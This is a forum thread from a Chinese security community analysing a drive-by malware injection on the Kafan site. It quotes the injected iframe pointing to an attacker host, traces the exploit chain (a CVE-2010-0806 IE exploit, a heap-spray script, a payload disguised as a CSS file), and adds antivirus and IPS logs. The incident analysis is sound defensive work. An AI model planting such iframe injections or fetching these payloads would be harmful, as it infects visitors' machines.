卡饭又一次被挂马...样本...

hx1997

刚才卡饭又被挂马了（貌似挺老的马），访问时被ESET拦下（ESET V5~） 提示：

2011-5-24 23:59:37    hxxp://ads31.3322.org:8832/FM01/ff.htm    JS/Exploit.CVE-2010-0806.A 特洛伊木马    连接中断 - 已隔离

于是看了下卡饭源代码，囧了...

<iframe src=http://ads31.3322.org:8832/FM01/index.html width=100 height=0><script language="javascript" type="text/javascript" src="http://js.users.51.la/2718301.js"></script>

就剩这一点了，囧囧......
接着，MDecoder...

Log generated by hx1997 use mdecoder 0.67
[root]hxxp://ads31.3322.org:8832/FM01/index.html
    [exp]hxxp://ads31.3322.org:8832/FM01/ff.htm(Exploit.Ie0dayCVE0806.a)
        [script]hxxp://ads31.3322.org:8832/FM01/ap.js
        [virus]hxxp://58.221.36.199:8832/xx/fm01.css
    [iframe]hxxp://ads31.3322.org:8832/FM01/fl.htm
        [flash]hxxp://ads31.3322.org:8832/FM01/nb.swf

被MDecoder标红的地址或文件均被ESET报毒，注意下面还有个swf貌似也是病毒
http://www.virustotal.com/file-scan/report.html?id=7befa93d500dec36cb4bfe7ee1cdeb183f73e95f3f172a3264b8c11dd1dd33ba-1306253490

然后这三个打包在附件

ESET killed 2×, to 1×.

G:\Documents and Settings\Administrator.HX-C0987054243B\桌面\kafan.7z > 7ZIP > ff.htm - JS/Exploit.CVE-2010-0806.A 特洛伊木马
G:\Documents and Settings\Administrator.HX-C0987054243B\桌面\kafan.7z > 7ZIP > fm01.css - 可能是 Win32/AntiAV.NEV 特洛伊木马 的变种

http://samples.nod32.com.hk/index.php?a=query&lang=2&md5=d0de9ad12f730cf2ee6849f81e2a35ad

勇者无敌

我的小红伞也栏了

a256886572008

http://camas.comodo.com/cgi-bin/submit?file=c28b75103d864b3b10218dece9eaf714cf2d3401d123220574936fba3907b9d0

Auto Analysis Verdict
Suspicious+

Suspicious Actions Detected
Creates system services or drivers
Load system drivers

kangzhen

我只逮到这个~~~

2718301.js

1. document.write ('<a href="http://www.51.la/?2718301" target="_blank" title="我要啦免费统计 VIP 用户">贵宾统计</a>\n');
   
2. var a8301tf="51la";var a8301pu="";var a8301pf="51la";var a8301su=window.location;var a8301sf=document.referrer;var a8301of="";var a8301op="";var a8301ops=1;var a8301ot=1;var a8301d=new Date();var a8301color="";if (navigator.appName=="Netscape"){a8301color=screen.pixelDepth;} else {a8301color=screen.colorDepth;}
   
3. try{a8301tf=top.document.referrer;}catch(e){}
   
4. try{a8301pu =window.parent.location;}catch(e){}
   
5. try{a8301pf=window.parent.document.referrer;}catch(e){}
   
6. try{a8301ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8301ops=(a8301ops==null)?1: (parseInt(unescape((a8301ops)[2]))+1);var a8301oe =new Date();a8301oe.setTime(a8301oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a8301ops+ ";path=/;expires="+a8301oe.toGMTString();a8301ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8301ot==null){a8301ot=1;}else{a8301ot=parseInt(unescape((a8301ot)[2])); a8301ot=(a8301ops==1)?(a8301ot+1):(a8301ot);}a8301oe.setTime(a8301oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a8301ot+";path=/;expires="+a8301oe.toGMTString();}catch(e){}
   
7. a8301of=a8301sf;if(a8301pf!=="51la"){a8301of=a8301pf;}if(a8301tf!=="51la"){a8301of=a8301tf;}a8301op=a8301pu;try{lainframe}catch(e){a8301op=a8301su;}document.write('<img style="width:0px;height:0px" src="http://vip.51.la:82/go.asp?svid=2&id=2718301&tpages='+a8301ops+'&ttimes='+a8301ot+'&tzone='+(0-a8301d.getTimezoneOffset()/60)+'&tcolor='+a8301color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a8301of)+'&vpage='+escape(a8301op)+'" />');

复制代码

bluelily

刚刚蜘蛛也拦截了    没有提示……

hx1997

回复 4楼 kangzhen 的帖子

呵呵那个好像是clean的，位于Redoce的忽略列表内......

kangzhen

不知道为什么我用MDecoder分析时，微点老是报蠕虫，只能用在线网页分析~~~

wjcharles

hx1997 发表于 2011-5-25 00:50
刚才卡饭又被挂马了（貌似挺老的马），访问时被ESET拦下（ESET V5~） 提示：

2011-5-24 23:59:37    hxx ...

怪不得有段时间卡饭打不开
貌似那个swf也是指向那个css，chrome打开swf导致flash插件崩溃，但地址栏已经变成了那个css

附nis记录

类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明,类别
2011/5/25 1:24,高,阻止了 ads31.3322.org 的入侵企图,已阻止,不需要操作,HTTP CSS PE Download,不需要操作,不需要操作,"ads31.3322.org (58.221.36.199, 8832)",58.221.36.199:8832/xx/fm01.css,"WJCH-PC (210.32.11.239, 51778)",58.221.36.199 (58.221.36.199),"TCP, 端口 8832",
2011/5/25 1:23,高,阻止了 ads31.3322.org 的入侵企图,已阻止,不需要操作,Web Attack: Malicious Javascript Heap Spray Generic,不需要操作,不需要操作,"ads31.3322.org (58.221.36.199, 8832)",ads31.3322.org:8832/FM01/ap.js,"WJCH-PC (210.32.11.239, 51764)",58.221.36.199 (58.221.36.199),"TCP, 端口 8832",
2011/5/25 1:22,高,阻止了 ads31.3322.org 的入侵企图,已阻止,不需要操作,Web Attack: Malicious Javascript Heap Spray Generic,不需要操作,不需要操作,"ads31.3322.org (58.221.36.199, 8832)",ads31.3322.org:8832/FM01/ap.js,"WJCH-PC (210.32.11.239, 51763)",58.221.36.199 (58.221.36.199),"TCP, 端口 8832",

明月丶舞白衣

我的谷歌浏览器就直接拦截了……nis都没有理他……金山么？么反应，难道是谷哥v5？

z13667152750

回复 9楼 cs52089757 的帖子

金山和360都拦截了，比chrome早很多
不过是拦截的ie，对chrome的支持都不完善
另外{过}{滤}挂的马对非ie内核无效
估计对保护模式的ie也无效